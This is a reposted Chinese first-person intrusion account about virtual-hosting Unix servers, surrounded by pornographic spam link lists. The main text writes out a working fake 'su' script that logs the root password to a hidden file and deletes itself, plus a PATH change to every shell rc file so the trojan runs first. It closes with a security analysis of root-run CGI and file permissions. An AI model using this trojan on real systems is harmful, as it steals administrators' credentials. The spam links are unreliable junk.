在线看毛片视频-国产免费av在线-欧美日韩一区二区三区-国产成人无码av在线播放无广告-亚洲人va欧美va人人爽-国产第一草草-西班牙黄色片-四虎在线网站8848-最新av片免费网站入口-东京热无码中文字幕av专区-日本大人吃奶视频xxxx-欧美精品一区二区三区四区五区-国产片天天弄-国产免费内射又粗又爽密桃视频-欧美爱爱网站-日韩v欧美

當前位置:雨林木風下載站 > 安全殺毒教程 > 詳細頁面

由一次入侵案例看虛擬主機系統的安全問題(下)

由一次入侵案例看虛擬主機系統的安全問題(下)

更新時間:2025-10-21 文章作者:未知 信息來源:網絡 閱讀次數:

網絡技術是從1990年代中期發展起來的新技術,它把互聯網上分散的資源融為有機整體,實現資源的全面共享和有機協作,使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計算機、存儲資源、數據...
網絡技術是從1990年代中期發展起來的新技術,它把互聯網上分散的資源融為有機整體,實現資源的全面共享和有機協作,使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計算機、存儲資源、數據資源、信息資源、知識資源、專家資源、大型數據庫、網絡、傳感器等。 當前的互聯網只限于信息共享,網絡則被認為是互聯網發展的第三階段。

由一次入侵實例看虛擬主機系統的安全問題(下)
[ 作者:Sinbad轉貼自:本站原創點擊數:77文章錄入:中國之鷹 ]
雖然到目前為止,我事實上已經控制了他所有的UNIX主機,也早就有了root權限,但root的密碼我還是不知道,這多少還有點不甘心,怎樣來得到這個密碼呢?窮舉當然是一種,但我就算知道了root密碼,也不想要干什么,何必費這么大的勁,所以我決定來一招偷天換日,雖然sysadm很少會從telnet登錄,但他總要有登陸的時候的,而且一登陸肯定要干root才干的事,他必須使用su命令讓自己成為root,使用su命令的時候當然需要輸入root的密碼,我就可從這點入手,做一個假的su來欺騙,讓他先運行的是我寫的su,把他輸入的密碼保存到一個文件上,即使他的密碼是對的,也給他出錯提示,然后刪除我的這個su,他再次運行的就是真正的su了。所以我用sysadm登錄并寫了如下腳本放在他的用戶目錄下,文件名為su
%vi su
#!/bin/sh
echo -n "Password:"
stty -echo;read PASSWD;stty echo
echo "$PASSWD">>/tmp/.password
echo;
echo "Sorry"
rm -fr ~/su
:wq
%chmod 755 su

為了讓他先運行的是我的su而不是系統的su,還需要改變shell的rc文件,所以打開.cshrc 在
set path = (/sbin /bin /usr/sbin /usr/bin /usr/local/sbin /usr/local/bin $HOME/bin)前面增加一個~,
即讓系統在查找命令時首先查找的是自己的目錄,就是放有我寫的su的目錄,變成這個樣子
set path = (~ /sbin /bin /usr/sbin /usr/bin /usr/local/sbin /usr/local/bin $HOME/bin)
因為不知道他會使用那個shell,所以每一個rc文件都做了同樣的處理......

最后的結果當然是順利的取得了root的密碼,雖然這個方法看起來很簡陋,容易看穿,但事實上卻是非常的隱蔽,在一個UNIX系統上,輸入密碼是連個*都沒有給你回顯的,管理員去su的時候,一般都是有事,需要很快做好,輸錯一次密碼應該還沒感覺過來,就算之后感覺出來了但我這個su又是運行一次就刪掉了,不像什么木馬后門之類,做完事還大摸大樣的留在那里,而rc文件,一般設置完成之后都很少有去看的,大不了我得到密碼之后改回來就是了,基本上并沒有留下什么痕跡。

實際上,這個入侵的實例,由頭到尾都是極為普通的,沒有什么高技術的成分,也沒有現在人家都喜歡用的什么什么漏洞,什么什么溢出,只是由一個普通用戶的弱口令開始,慢慢的發展到了整個主機群被控于一個入侵者的手中,事實上,操作系統和各種相關服務的本身并沒有什么漏洞,問題主要還是發生在CGI程序的編寫,維護中的疏忽,管理員對安全問題不敏感這些上。在系統本身的漏洞少這點上,應該可以看出,主機一開始是由一些資深的工程師配置,之后也會根據以發現的漏洞做修補,但在以后的管理過程中,是由下一層技術人員負責,這一層的人往往技術面不廣,人家叫干什么就干什么,不會有很大的責任壓力,這樣就把安全問題越捅越大。如果沒有那個備份文件,我根本不能了解那個以root運行的apache的cgi-bin的目錄結構和具體的文件名,因為其他人并沒有r權限。第二個就是suid為root的程序的寫法不夠嚴格(以root運行的apache執行CGI時和suid root是差不多一樣的),在一個虛擬主機上,為了讓用戶可以通過web界面來管理,不得不讓apache以root的身份運行,因為用戶的設置,需要改變很多系統的配置文件,如passwd httpd.conf sendmail.cf 等等,雖然apache的suexe提供了比squid更多安全選項如docroot等,但在這里根本就派不上用場。所以這個CGI應該是每一行代碼都要知道自己是以root運行的,絲毫不得有差錯,但遺憾的是,我見到的大多數服務商的這種CGI都忘記了自己是誰,其寫法和普通的CGI類似,創建的文件大多是設置為666,777,而程序本身的屬性為755,事實上,當apache加入suexec這個功能后,CGI程序本身設置為700,其他文件為400就可以了,可以做到除了自己,任何人不可以讀。如果沒有這個屬性的問題,在上面的實例中,我也不可能在cgi-bin下面創建文件,讓apache去運行,也就無法改變主業,復制文件,修改程序。正是這一步,把整個系統推向了被毀滅的邊緣。第三個問題就老生常談了,人本身的安全意識問題,在幾個服務商的主機上都發現了,同一個服務商,它的結構一樣的不同的主機,某些目錄的權限也不一樣,這個很明顯是在日常的維護中改變的。在維護過程中,對一些微妙的東西不注意,往往也是危險發生的原因,比如那個su,就這樣讓我把root密碼給偷了去。而上面提及的問題,到頭來也是體現在這個問題上,安全似乎沒有大小之分,一個大的遠程溢出可以讓入侵者得到root,但只是一些小小疏忽也可以讓入侵者得到root,但大家往往都把注意力集中在一些系統漏洞的修補上,卻忽視了某些"小問題"。

在目前的技術水平上實現的虛擬主機,這些問題的出現應該說是在所難免的,因為這涉及到了服務商的整個員工隊伍的素質問題,在沒有更好的虛擬主機的實現方法之前,如果從技術方面考慮,我覺得應該在權限方面多下功夫,比如用程序隔一定時間(如一小時)檢查各個重要的目錄、文件是否有被修改,用編譯的程序來代替腳本類型的程序等等,說下去又一長篇大論,本人知識水平有限,為了避免在各位高人面前班門弄斧,就此打住。 
  
 



網絡的神奇作用吸引著越來越多的用戶加入其中,正因如此,網絡的承受能力也面臨著越來越嚴峻的考驗―從硬件上、軟件上、所用標準上......,各項技術都需要適時應勢,對應發展,這正是網絡迅速走向進步的催化劑。

溫馨提示:喜歡本站的話,請收藏一下本站!

本類教程下載

系統下載排行

在线看毛片视频-国产免费av在线-欧美日韩一区二区三区-国产成人无码av在线播放无广告-亚洲人va欧美va人人爽-国产第一草草-西班牙黄色片-四虎在线网站8848-最新av片免费网站入口-东京热无码中文字幕av专区-日本大人吃奶视频xxxx-欧美精品一区二区三区四区五区-国产片天天弄-国产免费内射又粗又爽密桃视频-欧美爱爱网站-日韩v欧美
  • <li id="86scu"><menu id="86scu"></menu></li>
    <li id="86scu"></li>
    <button id="86scu"></button>
  • <s id="86scu"></s><button id="86scu"><menu id="86scu"></menu></button>
  • 91福利国产成人精品播放| 老太脱裤子让老头玩xxxxx| 国产91在线视频观看| av 日韩 人妻 黑人 综合 无码| 一级淫片在线观看| 天天综合成人网| www.久久com| www.18av.com| av黄色在线网站| 北条麻妃在线一区| 中文字幕视频在线免费观看| 久久婷婷国产91天堂综合精品| 青青青国产在线视频| 亚洲三级视频网站| 欧洲美女亚洲激情| 50度灰在线观看| 无码人妻丰满熟妇区96| 国产综合免费视频| 日日干日日操日日射| 99热都是精品| 国产日产欧美视频| 精品久久久99| 亚洲熟妇av日韩熟妇在线| 欧美黄色一级片视频| 涩多多在线观看| 日本一道本久久| 亚洲天堂av一区二区| 日韩不卡视频一区二区| 怡红院av亚洲一区二区三区h| 天天操天天爽天天射| 日韩国产精品毛片| 性生交免费视频| 国产美女在线一区| 91国内在线播放| 激情综合在线观看| 99精品视频免费版的特色功能| 成人国产在线看| 成人av毛片在线观看| 欧美 日本 亚洲| 桥本有菜av在线| 国产v亚洲v天堂无码久久久 | 亚洲美免无码中文字幕在线| 欧美一级小视频| 国产无套粉嫩白浆内谢的出处| 热这里只有精品| 黑森林精品导航| 国产原创中文在线观看| 老司机av福利| 波多野结衣国产精品| www.99在线| 91在线视频观看免费| 男人用嘴添女人下身免费视频| 涩多多在线观看| 欧美日韩一区二区三区69堂| 99精品免费在线观看| 国产精品国产对白熟妇| a级网站在线观看| 伊人五月天婷婷| 爱豆国产剧免费观看大全剧苏畅 | 亚洲色成人www永久在线观看| www,av在线| 天天干天天曰天天操| www.久久av.com| 污污网站免费看| 久久久久久久久久久久91| 蜜臀视频一区二区三区| 妺妺窝人体色www在线观看| 毛片在线视频播放| 成年人免费在线播放| 黄色片一级视频| 超碰av在线免费观看| 国产免费又粗又猛又爽| 亚洲激情在线观看视频| 免费一区二区三区在线观看| 中文字幕亚洲影院| 国产免费色视频| 日本xxxxxxxxxx75| 亚欧无线一线二线三线区别| 啊啊啊国产视频| 国产在线视频三区| 国产日韩av网站| 日日噜噜夜夜狠狠| 日本一级淫片演员| 日韩av三级在线| 欧美三级午夜理伦三级富婆| 黄色一级视频播放| 浮妇高潮喷白浆视频| 亚洲免费av一区| 欧美中日韩在线| 无码人妻丰满熟妇区五十路百度| 在线观看高清免费视频| 久久久国内精品| 欧美日韩亚洲一二三| 午夜天堂在线视频| 麻豆tv在线播放| xxx中文字幕| 蜜臀av午夜一区二区三区| 日日夜夜精品视频免费观看| 男人的天堂狠狠干| 亚洲精品第三页| 欧美日韩黄色一级片| 一级 黄 色 片一| www.国产区| 91亚洲精品国产| 在线观看中文av| 热久久精品免费视频| 日韩精品在线视频免费观看| 一区二区三区欧美精品| 日韩av资源在线| 日韩久久久久久久久久久久| 在线观看岛国av| 播放灌醉水嫩大学生国内精品| 99日在线视频| 色婷婷狠狠18| 久热免费在线观看| 99热在线这里只有精品| 欧美大黑帍在线播放| 91香蕉国产线在线观看| 丰满少妇被猛烈进入高清播放| a级黄色片免费| 中国老女人av| 女女同性女同一区二区三区按摩| 亚洲另类第一页| www.这里只有精品| 亚欧美在线观看| 日本www.色| 国产又粗又长又大的视频| 免费观看成人在线视频| 国产免费黄色av| 男人添女人下面高潮视频| 欧美极品欧美精品欧美| 亚欧无线一线二线三线区别| 99精品在线免费视频| 久久国产精品视频在线观看| 国产精品自拍片| www日韩视频| 色哟哟精品视频| 日韩一级免费片| 国产又大又长又粗又黄| 免费不卡av网站| 久久在线中文字幕| 欧美大片在线播放| 精品视频无码一区二区三区| 国产九九在线视频| 五月天av影院| 青青艹视频在线| 在线观看高清免费视频| 亚洲精品在线网址| 欧美视频在线第一页| 日韩av在线第一页| 天天做天天干天天操| 男人草女人视频| 激情综合网俺也去| 日韩第一页在线观看| a天堂资源在线观看| 人妻熟女一二三区夜夜爱| 天天视频天天爽| 黄色a级在线观看| 97国产精东麻豆人妻电影| 色播五月激情五月| 免费无遮挡无码永久视频| www.se五月| 99色这里只有精品| 麻豆三级在线观看| 青青草成人免费在线视频| 玖玖爱视频在线| 欧美视频在线免费播放| 中文字幕av导航| 色综合手机在线| 免费无遮挡无码永久视频| 伊人五月天婷婷| 中文字幕视频在线免费观看| 久久人人爽人人爽人人av| 色播五月激情五月| 欧美韩国日本在线| av网站手机在线观看| 天堂av在线网站| 91九色在线观看视频| 久久久久久av无码免费网站下载| 999在线免费视频| 日韩av资源在线| 成熟了的熟妇毛茸茸| 男人j进女人j| 国产精品亚洲天堂| 手机在线国产视频| www.cao超碰| 97超碰人人爽| 日韩高清第一页| 在线观看免费的av| 亚洲精品视频导航| 久久久国产欧美| 欧美日韩一区二区在线免费观看 | 少妇高清精品毛片在线视频| 少妇人妻无码专区视频| 野外做受又硬又粗又大视频√| 日韩av福利在线观看| 永久av免费在线观看| 美女黄色片网站| 久久av喷吹av高潮av| 超级碰在线观看|